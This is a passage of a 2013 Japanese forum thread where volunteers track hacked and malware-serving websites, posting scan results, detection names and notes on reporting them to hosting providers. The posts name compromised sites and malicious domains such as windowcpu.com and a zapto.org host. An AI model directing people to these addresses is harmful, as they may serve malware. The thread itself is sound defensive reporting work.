今回もスルーなぬかようか
>>324
オツデス
こりは……
326 :/名無しさん[1-30] ◆.htmlXG20g :2013/09/06(金) 08:41:28.97
>>325
http://search.yahoo.co.jp/search?n=100&dups=1&p=site%3Ajcp%2Dkasiwara%2Eorg%20%22jcp%2Dkasiwara%2Eorg%2Fimg%22
http://search.yahoo.co.jp/search?n=100&dups=1&p=%2Dsite%3Ajcp%2Dkasiwara%2Eorg%20%22http%3A%2F%2Fjcp%2Dkasiwara%2Eorg%2Fimg%22
http://search.yahoo.co.jp/search?n=100&dups=1&p=site%3Ajcp%2Dkasiwara%2Eorg%20%22jcp%2Dkasiwara%2Eorg%2Fimg%22
http://search.yahoo.co.jp/search?n=100&dups=1&p=%2Dsite%3Ajcp%2Dkasiwara%2Eorg%20%22http%3A%2F%2Fjcp%2Dkasiwara%2Eorg%2Fimg%22
327 :/名無しさん[1-30] ◆.htmlXG20g :2013/09/06(金) 20:39:55.42
つーほーしたのは404だけど直ってなかた。。。orz......... >>325
328 :名無しさん@お腹いっぱい。:2013/09/08(日) 09:57:48.32
www1●ocn●ne●jp/~animal30/
www1●ocn●ne●jp/~kandn/
www3●ocn●ne●jp/~orange_t/
www4●ocn●ne●jp/~kyowa●k/
www6●ocn●ne●jp/~morizen/
www8●ocn●ne●jp/~chateau/
www8●ocn●ne●jp/~b-jack/
iidazeirishikai●jp/
whitecube●org/
fujinosato●co●jp/
amakusa-princehotel●jp/
loftjazz●jp/
60●43●234●181/
www1●ocn●ne●jp/~kandn/
www3●ocn●ne●jp/~orange_t/
www4●ocn●ne●jp/~kyowa●k/
www6●ocn●ne●jp/~morizen/
www8●ocn●ne●jp/~chateau/
www8●ocn●ne●jp/~b-jack/
iidazeirishikai●jp/
whitecube●org/
fujinosato●co●jp/
amakusa-princehotel●jp/
loftjazz●jp/
60●43●234●181/
329 :名無しさん@お腹いっぱい。:2013/09/08(日) 22:11:52.35
330 :名無しさん@お腹いっぱい。:2013/09/10(火) 16:10:47.96
セキュリティに関するニュースを淡々と伝えるスレ8
http://kohada.2ch.net/test/read.cgi/sec/1370942055/62
62 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2013/09/10(火) 13:52:22.39
IPA 独立行政法人 情報処理推進機構:ウェブサイト改ざん等のインシデントに対する注意喚起〜ウェブサイト改ざんが急激に増えています〜
http://www.ipa.go.jp/security/topics/alert20130906.html
http://kohada.2ch.net/test/read.cgi/sec/1370942055/62
62 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2013/09/10(火) 13:52:22.39
IPA 独立行政法人 情報処理推進機構:ウェブサイト改ざん等のインシデントに対する注意喚起〜ウェブサイト改ざんが急激に増えています〜
http://www.ipa.go.jp/security/topics/alert20130906.html
331 :名無しさん@お腹いっぱい。:2013/09/10(火) 19:15:51.54
>>328
D~morizen/
朝aguseで確認したところ ロリポップにリダイレクトされていました
win-iwate●com/
検出名:Trojan-Downloader.JS.Iframe.deu
今はaguseでは検出されませんが
ウイルストータルによるスキャン結果 検出率:9/ 47
https://www.virustotal.com/ja/file/d564422f0fd81a0aeda330094cfcf026b9eea8c36c2a83ec5d74237dba6d3225/analysis/1378805082/
GMOに連絡&>>6 のフォームhttps://secure.gmo.jp/contact/から発射したのですが
GMOのアビューズの人がもっと効率の良い連絡先として下記を教えてくれました
[email protected]
D~morizen/
朝aguseで確認したところ ロリポップにリダイレクトされていました
win-iwate●com/
検出名:Trojan-Downloader.JS.Iframe.deu
今はaguseでは検出されませんが
ウイルストータルによるスキャン結果 検出率:9/ 47
https://www.virustotal.com/ja/file/d564422f0fd81a0aeda330094cfcf026b9eea8c36c2a83ec5d74237dba6d3225/analysis/1378805082/
GMOに連絡&>>6 のフォームhttps://secure.gmo.jp/contact/から発射したのですが
GMOのアビューズの人がもっと効率の良い連絡先として下記を教えてくれました
[email protected]
332 :名無しさん@お腹いっぱい。:2013/09/12(木) 20:45:57.31
ベネッセのサイトにXSS脆弱性がある教えてあげないと→プロバイダにネット接続を止められる
http://engawa.2ch.net/test/read.cgi/poverty/1378950516/
>>329
下記のGMOクラウド(gmocloud.)専用のフォームもしくは>>331の[email protected]でないと時間が掛かりそうですが、ひたすら待つのだー
http://www.gmocloud.com/contact/
↓
https://contact.gmocloud.com/form/contact/
http://engawa.2ch.net/test/read.cgi/poverty/1378950516/
>>329
下記のGMOクラウド(gmocloud.)専用のフォームもしくは>>331の[email protected]でないと時間が掛かりそうですが、ひたすら待つのだー
http://www.gmocloud.com/contact/
↓
https://contact.gmocloud.com/form/contact/
333 :名無しさん@お腹いっぱい。:2013/09/12(木) 20:47:11.78
\(^o^)/オワタ
334 :名無しさん@お腹いっぱい。:2013/09/12(木) 21:26:32.06
>>332
Officeさんの件があったからダメだよなあ
Officeさんの件があったからダメだよなあ
335 :/名無しさん[1-30] ◆.htmlXG20g :2013/09/14(土) 23:02:17.81
ふっきっき
336 :/名無しさん[1-30] ◆.htmlXG20g :2013/09/28(土) 14:39:44.83
> このサイトは第三者によってハッキングされている可能性があります。
ぐぐるの警告半端無い
ぐぐるの警告半端無い
337 :/名無しさん[1-30] ◆.htmlXG20g :2013/09/28(土) 14:46:30.66
338 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/09(水) 16:56:59.21
改竄されたサイトから「iPhone Spy」とかゆーとこに誘導されるもより
なんじゃこりゃ
なんじゃこりゃ
339 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/09(水) 17:56:47.05
>>338
url/3cbfd28e6c8dcebc9e593232e5baf0211280926566e6afc2d6f401a0e502b77b/analysis/1381308816/
BitDefender Malware site
url/3cbfd28e6c8dcebc9e593232e5baf0211280926566e6afc2d6f401a0e502b77b/analysis/1381308816/
BitDefender Malware site
340 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/11(金) 13:25:40.87
>>338
url/61ec0f9846661b7ab25e308baccea51a3d71f80a8891f5bf299be50a90b2290d/analysis/1381465075/
SecureBrain Malicious site
さくらにつーほ
受理済み
url/61ec0f9846661b7ab25e308baccea51a3d71f80a8891f5bf299be50a90b2290d/analysis/1381465075/
SecureBrain Malicious site
さくらにつーほ
受理済み
341 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/11(金) 13:32:17.86
>>339
url/3cbfd28e6c8dcebc9e593232e5baf0211280926566e6afc2d6f401a0e502b77b/analysis/1381310213/
url/3cbfd28e6c8dcebc9e593232e5baf0211280926566e6afc2d6f401a0e502b77b/analysis/1381465686/
Detection ratio: 2 / 38
BitDefender Malware site
CLEAN MX Suspicious site
Sophos Malicious site
url/3cbfd28e6c8dcebc9e593232e5baf0211280926566e6afc2d6f401a0e502b77b/analysis/1381310213/
url/3cbfd28e6c8dcebc9e593232e5baf0211280926566e6afc2d6f401a0e502b77b/analysis/1381465686/
Detection ratio: 2 / 38
BitDefender Malware site
CLEAN MX Suspicious site
Sophos Malicious site
342 :名無しさん@お腹いっぱい。:2013/10/11(金) 21:52:41.66
windowcpu●com/
343 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/11(金) 23:43:49.37
Dr.Webがぴこーんだけどわからんちん。。。orz.....
344 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/12(土) 00:00:16.95
そーすみてたらこんなのがあった
https://www.virustotal.com/en/file/d445959c21c4fb94c5aa4f247812ba09b6d525d89dab7cc138d6892ce859142c/analysis/1373941554/
https://www.virustotal.com/en/file/d445959c21c4fb94c5aa4f247812ba09b6d525d89dab7cc138d6892ce859142c/analysis/1373941554/
345 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/12(土) 00:04:39.58
とりあえずめも
DQpodHRwOi8vbWVnYWxvZG9uLmpwLzIwMTMtMTAxMS0yMzQ0LTAwL29ubGluZS5kcndlYi5jb20v
cmVzdWx0Lz91cmw9aHR0cCUzQSUyRiUyRndpbmRvd2NwdSUyRWNvbSUyRg0KaHR0cDovL21lZ2Fs
b2Rvbi5qcC8yMDEzLTEwMTItMDAwMy0xNi93d3cuZGFuLmNvLnVrL3ZpZXdzb3VyY2UvaW5kZXgu
cGhwP3VybD1odHRwJTNBJTJGJTJGd2luZG93Y3B1JTJFY29tJTJGcG9saWN5JTJFcGhwDQo=
DQpodHRwOi8vbWVnYWxvZG9uLmpwLzIwMTMtMTAxMS0yMzQ0LTAwL29ubGluZS5kcndlYi5jb20v
cmVzdWx0Lz91cmw9aHR0cCUzQSUyRiUyRndpbmRvd2NwdSUyRWNvbSUyRg0KaHR0cDovL21lZ2Fs
b2Rvbi5qcC8yMDEzLTEwMTItMDAwMy0xNi93d3cuZGFuLmNvLnVrL3ZpZXdzb3VyY2UvaW5kZXgu
cGhwP3VybD1odHRwJTNBJTJGJTJGd2luZG93Y3B1JTJFY29tJTJGcG9saWN5JTJFcGhwDQo=
346 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/12(土) 00:12:38.37
肝心なもの
url/20d990d7f97376b482ffe32cf29772c7c2f93ab89fbc7bca87d792cb9c4e4eec/analysis/1381504300/
url/20d990d7f97376b482ffe32cf29772c7c2f93ab89fbc7bca87d792cb9c4e4eec/analysis/1381504300/
347 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/13(日) 04:35:22.00 ID:???
349 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/13(日) 09:48:51.04 ID:???
>>347進捗状況
https://www.virustotal.com/en/url/472ba864fa32e404e9dcf86ade4ec0427db3c3a47b449544ecc0d4f61b8d8866/analysis/1381624195/
Detection ratio: 0 / 38
Analysis date: 2013-10-13 00:29:55 UTC
Response content SHA-256
17a5b9e183c7a641a2e00267e4f1f40415ba750f11c9a0df00e26a0c649bb067
https://www.virustotal.com/en/file/17a5b9e183c7a641a2e00267e4f1f40415ba750f11c9a0df00e26a0c649bb067/analysis/1381623932/
SHA256: 17a5b9e183c7a641a2e00267e4f1f40415ba750f11c9a0df00e26a0c649bb067
File name: 90
Detection ratio: 3 / 48
Analysis date: 2013-10-13 00:25:32 UTC
Antivirus Result Update
TrendMicro-HouseCall TROJ_GEN.F47V1012 20131013
Avast JS:Iframe-ARZ [Trj] 20131013
AntiVir HTML/IFrame.EB.5 20131012
https://www.virustotal.com/en/url/9737ef2a39ab2682bb02cda26e08ca2b47432416795e083c22264bde0874002d/analysis/1381624356/
Detection ratio: 0 / 38
Analysis date: 2013-10-13 00:32:36 UTC
Response content SHA-256
483ced0ca5875d39131bf423c83077e317d1ddf343385de2a5c0d38926174ea4
https://www.virustotal.com/en/file/483ced0ca5875d39131bf423c83077e317d1ddf343385de2a5c0d38926174ea4/analysis/1381623934/
SHA256: 483ced0ca5875d39131bf423c83077e317d1ddf343385de2a5c0d38926174ea4
File name: 105
Detection ratio: 3 / 48
Analysis date: 2013-10-13 00:25:34 UTC
Antivirus Result Update
TrendMicro-HouseCall TROJ_GEN.F47V1012 20131013
Avast JS:Iframe-ARZ [Trj] 20131013
AntiVir HTML/IFrame.EB.5 20131012
https://www.virustotal.com/en/url/472ba864fa32e404e9dcf86ade4ec0427db3c3a47b449544ecc0d4f61b8d8866/analysis/1381624195/
Detection ratio: 0 / 38
Analysis date: 2013-10-13 00:29:55 UTC
Response content SHA-256
17a5b9e183c7a641a2e00267e4f1f40415ba750f11c9a0df00e26a0c649bb067
https://www.virustotal.com/en/file/17a5b9e183c7a641a2e00267e4f1f40415ba750f11c9a0df00e26a0c649bb067/analysis/1381623932/
SHA256: 17a5b9e183c7a641a2e00267e4f1f40415ba750f11c9a0df00e26a0c649bb067
File name: 90
Detection ratio: 3 / 48
Analysis date: 2013-10-13 00:25:32 UTC
Antivirus Result Update
TrendMicro-HouseCall TROJ_GEN.F47V1012 20131013
Avast JS:Iframe-ARZ [Trj] 20131013
AntiVir HTML/IFrame.EB.5 20131012
https://www.virustotal.com/en/url/9737ef2a39ab2682bb02cda26e08ca2b47432416795e083c22264bde0874002d/analysis/1381624356/
Detection ratio: 0 / 38
Analysis date: 2013-10-13 00:32:36 UTC
Response content SHA-256
483ced0ca5875d39131bf423c83077e317d1ddf343385de2a5c0d38926174ea4
https://www.virustotal.com/en/file/483ced0ca5875d39131bf423c83077e317d1ddf343385de2a5c0d38926174ea4/analysis/1381623934/
SHA256: 483ced0ca5875d39131bf423c83077e317d1ddf343385de2a5c0d38926174ea4
File name: 105
Detection ratio: 3 / 48
Analysis date: 2013-10-13 00:25:34 UTC
Antivirus Result Update
TrendMicro-HouseCall TROJ_GEN.F47V1012 20131013
Avast JS:Iframe-ARZ [Trj] 20131013
AntiVir HTML/IFrame.EB.5 20131012
350 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/13(日) 09:52:39.18 ID:???
>>347進捗状況>347続き
一部改行
https://www.virustotal.com/en/url/9387e2ccd8b62bb36c8226cad01e523bb58730c49626fecd52438cb32fef1229/analysis/1381624491/
Detection ratio: 0 / 38 Analysis date: 2013-10-13 00:34:51 UTC
Response content SHA-256 d57cd6b947bea6ffa042cfb9343d2d09421bf5bae5425647fd8bc5126f839e74
https://www.virustotal.com/en/file/d57cd6b947bea6ffa042cfb9343d2d09421bf5bae5425647fd8bc5126f839e74/analysis/1381623933/
SHA256: d57cd6b947bea6ffa042cfb9343d2d09421bf5bae5425647fd8bc5126f839e74
File name: 110
File type: HTML
Detection ratio: 3 / 48
Analysis date: 2013-10-13 00:25:33 UTC
Antivirus Result Update
TrendMicro-HouseCall TROJ_GEN.F47V1012 20131013
Avast JS:Iframe-ARZ [Trj] 20131013
AntiVir HTML/IFrame.EB.5 20131012
https://www.virustotal.com/en/url/a95087d8521828d733ac910eefec3d4145eb0e2064e2f4190de51fb2419f2138/analysis/1381624572/
Detection ratio: 2 / 38 Analysis date: 2013-10-13 00:36:12 UTC
Fortinet Malware site
SCUMWARE.org Malware site
Response content SHA-256 f4e4ff9ceeafa62070baa2797db0a0cdaf5d2f5d711ce53dde3c87da9a6f8bea
https://www.virustotal.com/en/file/f4e4ff9ceeafa62070baa2797db0a0cdaf5d2f5d711ce53dde3c87da9a6f8bea/analysis/1381623933/
SHA256: f4e4ff9ceeafa62070baa2797db0a0cdaf5d2f5d711ce53dde3c87da9a6f8bea
File name: 114
File type: HTML
Detection ratio: 3 / 48
Analysis date: 2013-10-13 00:25:33 UTC
Antivirus Result Update
TrendMicro-HouseCall TROJ_GEN.F47V1012 20131013
Avast JS:Iframe-ARZ [Trj] 20131013
AntiVir HTML/IFrame.EB.5 20131012
一部改行
https://www.virustotal.com/en/url/9387e2ccd8b62bb36c8226cad01e523bb58730c49626fecd52438cb32fef1229/analysis/1381624491/
Detection ratio: 0 / 38 Analysis date: 2013-10-13 00:34:51 UTC
Response content SHA-256 d57cd6b947bea6ffa042cfb9343d2d09421bf5bae5425647fd8bc5126f839e74
https://www.virustotal.com/en/file/d57cd6b947bea6ffa042cfb9343d2d09421bf5bae5425647fd8bc5126f839e74/analysis/1381623933/
SHA256: d57cd6b947bea6ffa042cfb9343d2d09421bf5bae5425647fd8bc5126f839e74
File name: 110
File type: HTML
Detection ratio: 3 / 48
Analysis date: 2013-10-13 00:25:33 UTC
Antivirus Result Update
TrendMicro-HouseCall TROJ_GEN.F47V1012 20131013
Avast JS:Iframe-ARZ [Trj] 20131013
AntiVir HTML/IFrame.EB.5 20131012
https://www.virustotal.com/en/url/a95087d8521828d733ac910eefec3d4145eb0e2064e2f4190de51fb2419f2138/analysis/1381624572/
Detection ratio: 2 / 38 Analysis date: 2013-10-13 00:36:12 UTC
Fortinet Malware site
SCUMWARE.org Malware site
Response content SHA-256 f4e4ff9ceeafa62070baa2797db0a0cdaf5d2f5d711ce53dde3c87da9a6f8bea
https://www.virustotal.com/en/file/f4e4ff9ceeafa62070baa2797db0a0cdaf5d2f5d711ce53dde3c87da9a6f8bea/analysis/1381623933/
SHA256: f4e4ff9ceeafa62070baa2797db0a0cdaf5d2f5d711ce53dde3c87da9a6f8bea
File name: 114
File type: HTML
Detection ratio: 3 / 48
Analysis date: 2013-10-13 00:25:33 UTC
Antivirus Result Update
TrendMicro-HouseCall TROJ_GEN.F47V1012 20131013
Avast JS:Iframe-ARZ [Trj] 20131013
AntiVir HTML/IFrame.EB.5 20131012
351 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/13(日) 10:56:46.23 ID:???
http://kohada.2ch.net/test/read.cgi/sec/1379677112/419-420n
もちっと補足
そーすにぴこーんするかもなので注意
http://evuln.com/tools/malware-scanner/thethinkinghorse.com/
http://labs.sucuri.net/?malware&entry=2013-02-20
http://labs.sucuri.net/?malware&entry=2013-02-21
http://labs.sucuri.net/?malware&entry=2013-02-26
http://labs.sucuri.net/?malware&entry=2013-02-27
[中略]
http://labs.sucuri.net/?malware&entry=2013-04-08
http://labs.sucuri.net/?details=fdsfsddfs.zapto.org
もちっと補足
そーすにぴこーんするかもなので注意
http://evuln.com/tools/malware-scanner/thethinkinghorse.com/
http://labs.sucuri.net/?malware&entry=2013-02-20
http://labs.sucuri.net/?malware&entry=2013-02-21
http://labs.sucuri.net/?malware&entry=2013-02-26
http://labs.sucuri.net/?malware&entry=2013-02-27
[中略]
http://labs.sucuri.net/?malware&entry=2013-04-08
http://labs.sucuri.net/?details=fdsfsddfs.zapto.org
結構古い改ざんぽいね
最終変更日わからなかったけどアクセス元ごとに振り分けとか関係なく無くなってそう
今後も改ざんの可能性はあるので要対応ではありますが・・・
WordPressを簡単にインストールできてかっこいいサイト作れます!みたいに紹介するのは危ないね
こういうところだと自称ぱそこん得意な担当者がいなくなったらどうしようもない
最終変更日わからなかったけどアクセス元ごとに振り分けとか関係なく無くなってそう
今後も改ざんの可能性はあるので要対応ではありますが・・・
WordPressを簡単にインストールできてかっこいいサイト作れます!みたいに紹介するのは危ないね
こういうところだと自称ぱそこん得意な担当者がいなくなったらどうしようもない
353 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/13(日) 21:47:06.33 ID:???
>>347進捗状況>349-350 一部改行
https://www.virustotal.com/en/url/472ba864fa32e404e9dcf86ade4ec0427db3c3a47b449544ecc0d4f61b8d8866/analysis/1381667514/
Detection ratio: 2 / 38 Analysis date: 2013-10-13 12:31:54 UTC
Fortinet Malware site
SCUMWARE.org Malware site
https://www.virustotal.com/en/file/17a5b9e183c7a641a2e00267e4f1f40415ba750f11c9a0df00e26a0c649bb067/analysis/1381667363/
Detection ratio: 3 / 48 Analysis date: 2013-10-13 12:29:23 UTC
https://www.virustotal.com/en/url/9737ef2a39ab2682bb02cda26e08ca2b47432416795e083c22264bde0874002d/analysis/1381667535/
Detection ratio: 0 / 38 Analysis date: 2013-10-13 12:32:15 UTC
https://www.virustotal.com/en/file/483ced0ca5875d39131bf423c83077e317d1ddf343385de2a5c0d38926174ea4/analysis/1381667366/
Detection ratio: 3 / 48 Analysis date: 2013-10-13 12:29:26 UTC
https://www.virustotal.com/en/url/9387e2ccd8b62bb36c8226cad01e523bb58730c49626fecd52438cb32fef1229/analysis/1381667559/
Detection ratio: 2 / 38 Analysis date: 2013-10-13 12:32:39 UTC
Fortinet Malware site
SCUMWARE.org Malware site
https://www.virustotal.com/en/file/d57cd6b947bea6ffa042cfb9343d2d09421bf5bae5425647fd8bc5126f839e74/analysis/1381667364/
Detection ratio: 3 / 48 Analysis date: 2013-10-13 12:29:24 UTC
https://www.virustotal.com/en/url/a95087d8521828d733ac910eefec3d4145eb0e2064e2f4190de51fb2419f2138/analysis/1381667592/
Detection ratio: 3 / 38 Analysis date: 2013-10-13 12:33:12 UTC
CLEAN MX Malicious site
Fortinet Malware site
SCUMWARE.org Malware site
https://www.virustotal.com/en/file/f4e4ff9ceeafa62070baa2797db0a0cdaf5d2f5d711ce53dde3c87da9a6f8bea/analysis/1381667364/
Detection ratio: 3 / 48 Analysis date: 2013-10-13 12:29:24 UTC
>>352
古いのでなおさら見逃されてしまうようです……
https://www.virustotal.com/en/url/472ba864fa32e404e9dcf86ade4ec0427db3c3a47b449544ecc0d4f61b8d8866/analysis/1381667514/
Detection ratio: 2 / 38 Analysis date: 2013-10-13 12:31:54 UTC
Fortinet Malware site
SCUMWARE.org Malware site
https://www.virustotal.com/en/file/17a5b9e183c7a641a2e00267e4f1f40415ba750f11c9a0df00e26a0c649bb067/analysis/1381667363/
Detection ratio: 3 / 48 Analysis date: 2013-10-13 12:29:23 UTC
https://www.virustotal.com/en/url/9737ef2a39ab2682bb02cda26e08ca2b47432416795e083c22264bde0874002d/analysis/1381667535/
Detection ratio: 0 / 38 Analysis date: 2013-10-13 12:32:15 UTC
https://www.virustotal.com/en/file/483ced0ca5875d39131bf423c83077e317d1ddf343385de2a5c0d38926174ea4/analysis/1381667366/
Detection ratio: 3 / 48 Analysis date: 2013-10-13 12:29:26 UTC
https://www.virustotal.com/en/url/9387e2ccd8b62bb36c8226cad01e523bb58730c49626fecd52438cb32fef1229/analysis/1381667559/
Detection ratio: 2 / 38 Analysis date: 2013-10-13 12:32:39 UTC
Fortinet Malware site
SCUMWARE.org Malware site
https://www.virustotal.com/en/file/d57cd6b947bea6ffa042cfb9343d2d09421bf5bae5425647fd8bc5126f839e74/analysis/1381667364/
Detection ratio: 3 / 48 Analysis date: 2013-10-13 12:29:24 UTC
https://www.virustotal.com/en/url/a95087d8521828d733ac910eefec3d4145eb0e2064e2f4190de51fb2419f2138/analysis/1381667592/
Detection ratio: 3 / 38 Analysis date: 2013-10-13 12:33:12 UTC
CLEAN MX Malicious site
Fortinet Malware site
SCUMWARE.org Malware site
https://www.virustotal.com/en/file/f4e4ff9ceeafa62070baa2797db0a0cdaf5d2f5d711ce53dde3c87da9a6f8bea/analysis/1381667364/
Detection ratio: 3 / 48 Analysis date: 2013-10-13 12:29:24 UTC
>>352
古いのでなおさら見逃されてしまうようです……
354 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/15(火) 00:11:00.66 ID:???
他のサブドメインのアーカイブ見つけたけど……
http://megalodon.jp/2013-1015-0001-40/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Farchive%2Eis%2FBmo3y
http://megalodon.jp/2013-1015-0002-18/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Farchive%2Eis%2FMuyP
http://megalodon.jp/2013-1015-0004-38/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Farchive%2Eis%2FD7pl
偽造医薬品販売の踏み台だったのか
>>347
修正入ったみたい
http://megalodon.jp/2013-1015-0001-40/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Farchive%2Eis%2FBmo3y
http://megalodon.jp/2013-1015-0002-18/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Farchive%2Eis%2FMuyP
http://megalodon.jp/2013-1015-0004-38/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Farchive%2Eis%2FD7pl
偽造医薬品販売の踏み台だったのか
>>347
修正入ったみたい
355 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/15(火) 00:16:00.81 ID:???
iframeは消したみたいだけどWordPress更新はできてないような・・・
357 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/15(火) 01:32:15.24 ID:???
358 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/15(火) 20:28:11.03
スパムフォルダに入っていて今まで気付かなかったんだけど……
Subject : Mail box full
> 下記のメールは受信者[*************@*************] のメールボックスが満杯により受信できませんでした。
>>347
現在404
Subject : Mail box full
> 下記のメールは受信者[*************@*************] のメールボックスが満杯により受信できませんでした。
>>347
現在404
359 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/15(火) 21:29:05.99
>>347
Quttera
@quttera
https://twitter.com/quttera/status/389097558594699264
ツィートはスクリプトにしてたのねん
https://twitter.com/quttera
Quttera
@quttera
https://twitter.com/quttera/status/389097558594699264
ツィートはスクリプトにしてたのねん
https://twitter.com/quttera
360 :名無しさん@お腹いっぱい。:2013/10/16(水) 20:48:09.92
ウェブ経由のマルウェア感染防ぐ官民連携プロジェクトが11月より始動
http://www.security-next.com/043505
>プロジェクトに関する情報やマルウェア対策に関する情報を発信する専用サイトを10月15日に開設する予定。
どこにあるのかな?
我々はのんびりと出来るのかな?
http://www.security-next.com/043505
>プロジェクトに関する情報やマルウェア対策に関する情報を発信する専用サイトを10月15日に開設する予定。
どこにあるのかな?
我々はのんびりと出来るのかな?
361 :名無しさん@お腹いっぱい。:2013/10/16(水) 21:11:14.04
362 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/16(水) 22:38:29.92
参加企業・団体 | ACTIVEについて | Advanced Cyber Threats response InitiatiVE(ACTIVE)
http://www.active.go.jp/active/group.html
> マルウェア収集・駆除のための技術支援
> NTTコムテクノロジー株式会社
> NRIセキュアテクノロジーズ株式会社
> エヌ・ティ・ティ・コムチェオ株式会社
> エヌ・ティ・ティ・ソフトウェア株式会社
> エヌ・ティ・ティラーニングシステムズ株式会社
> エヌ・ティ・ティレゾナント株式会社
> 株式会社FFRI
> 株式会社カスペルスキー
> 株式会社日立製作所
> トレンドマイクロ株式会社
> 日本電信電話株式会社
> 日本マイクロソフト株式会社
> マカフィー株式会社
シマンテックや富士通研究所がないのはなぜー
http://www.active.go.jp/active/group.html
> マルウェア収集・駆除のための技術支援
> NTTコムテクノロジー株式会社
> NRIセキュアテクノロジーズ株式会社
> エヌ・ティ・ティ・コムチェオ株式会社
> エヌ・ティ・ティ・ソフトウェア株式会社
> エヌ・ティ・ティラーニングシステムズ株式会社
> エヌ・ティ・ティレゾナント株式会社
> 株式会社FFRI
> 株式会社カスペルスキー
> 株式会社日立製作所
> トレンドマイクロ株式会社
> 日本電信電話株式会社
> 日本マイクロソフト株式会社
> マカフィー株式会社
シマンテックや富士通研究所がないのはなぜー
363 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/18(金) 12:58:47.62
さくらインターネットには通報済み、受領の返事
それから1週間……
ご馳走 龍馬 | 六本木 和食割烹
http://www.siteadvisor.com/sites/msgpage/%72%79%75%75%6D%61%2E%6A%70
http://check.gred.jp/?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%72%79%75%75%6D%61%2E%6A%70%2F
http://www.bing.com/search?q=%22%76%69%61%67%72%61%22%20%73%69%74%65%3A%72%79%75%75%6D%61%2E%6A%70
http://search.yahoo.com/search?n=100&dups=1&p=%22%76%69%61%67%72%61%22%20%73%69%74%65%3A%72%79%75%75%6D%61%2E%6A%70
http://search.yahoo.co.jp/search?n=100&dups=1&p=%22%76%69%61%67%72%61%22%20%73%69%74%65%3A%72%79%75%75%6D%61%2E%6A%70
https://www.google.com/search?num=100&safe=off&newwindow=1&complete=0&filter=0&q=%22%76%69%61%67%72%61%22%20%73%69%74%65%3A%72%79%75%75%6D%61%2E%6A%70
This site may be hacked.
https://www.google.com/search?hl=en&num=100&safe=off&newwindow=1&complete=0&filter=0&q=%22%76%69%61%67%72%61%22%20%73%69%74%65%3A%72%79%75%75%6D%61%2E%6A%70
このサイトは第三者によってハッキングされている可能性があります。
https://www.google.com/search?hl=ja&num=100&safe=off&newwindow=1&complete=0&filter=0&q=%22%76%69%61%67%72%61%22%20%73%69%74%65%3A%72%79%75%75%6D%61%2E%6A%70
http://www.google.com/gwt/n?wsc=tb&ct=pg1&whp=30&u=%68%74%74%70%3A%2F%2F%77%77%77%2E%72%79%75%75%6D%61%2E%6A%70%2F
http://www.dan.co.uk/viewsource/index.php?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%72%79%75%75%6D%61%2E%6A%70%2F
WordPress 3.5.1
それから1週間……
ご馳走 龍馬 | 六本木 和食割烹
http://www.siteadvisor.com/sites/msgpage/%72%79%75%75%6D%61%2E%6A%70
http://check.gred.jp/?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%72%79%75%75%6D%61%2E%6A%70%2F
http://www.bing.com/search?q=%22%76%69%61%67%72%61%22%20%73%69%74%65%3A%72%79%75%75%6D%61%2E%6A%70
http://search.yahoo.com/search?n=100&dups=1&p=%22%76%69%61%67%72%61%22%20%73%69%74%65%3A%72%79%75%75%6D%61%2E%6A%70
http://search.yahoo.co.jp/search?n=100&dups=1&p=%22%76%69%61%67%72%61%22%20%73%69%74%65%3A%72%79%75%75%6D%61%2E%6A%70
https://www.google.com/search?num=100&safe=off&newwindow=1&complete=0&filter=0&q=%22%76%69%61%67%72%61%22%20%73%69%74%65%3A%72%79%75%75%6D%61%2E%6A%70
This site may be hacked.
https://www.google.com/search?hl=en&num=100&safe=off&newwindow=1&complete=0&filter=0&q=%22%76%69%61%67%72%61%22%20%73%69%74%65%3A%72%79%75%75%6D%61%2E%6A%70
このサイトは第三者によってハッキングされている可能性があります。
https://www.google.com/search?hl=ja&num=100&safe=off&newwindow=1&complete=0&filter=0&q=%22%76%69%61%67%72%61%22%20%73%69%74%65%3A%72%79%75%75%6D%61%2E%6A%70
http://www.google.com/gwt/n?wsc=tb&ct=pg1&whp=30&u=%68%74%74%70%3A%2F%2F%77%77%77%2E%72%79%75%75%6D%61%2E%6A%70%2F
http://www.dan.co.uk/viewsource/index.php?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%72%79%75%75%6D%61%2E%6A%70%2F
WordPress 3.5.1
364 :名無しさん@お腹いっぱい。:2013/10/18(金) 16:46:05.20
熱いバージョンだね
365 :/名無しさん[1-30] ◆.htmlXG20g :2013/10/19(土) 13:37:24.26
>>363
https://www.virustotal.com/en/url/61ec0f9846661b7ab25e308baccea51a3d71f80a8891f5bf299be50a90b2290d/analysis/1382157275/
Detection ratio: 2 / 38
Analysis date: 2013-10-19 04:34:35 UTC
URL Scanner Result
BitDefender Malware site
CLEAN MX Suspicious site
SecureBrain Malicious site
https://www.virustotal.com/en/url/61ec0f9846661b7ab25e308baccea51a3d71f80a8891f5bf299be50a90b2290d/analysis/1382157275/
Detection ratio: 2 / 38
Analysis date: 2013-10-19 04:34:35 UTC
URL Scanner Result
BitDefender Malware site
CLEAN MX Suspicious site
SecureBrain Malicious site
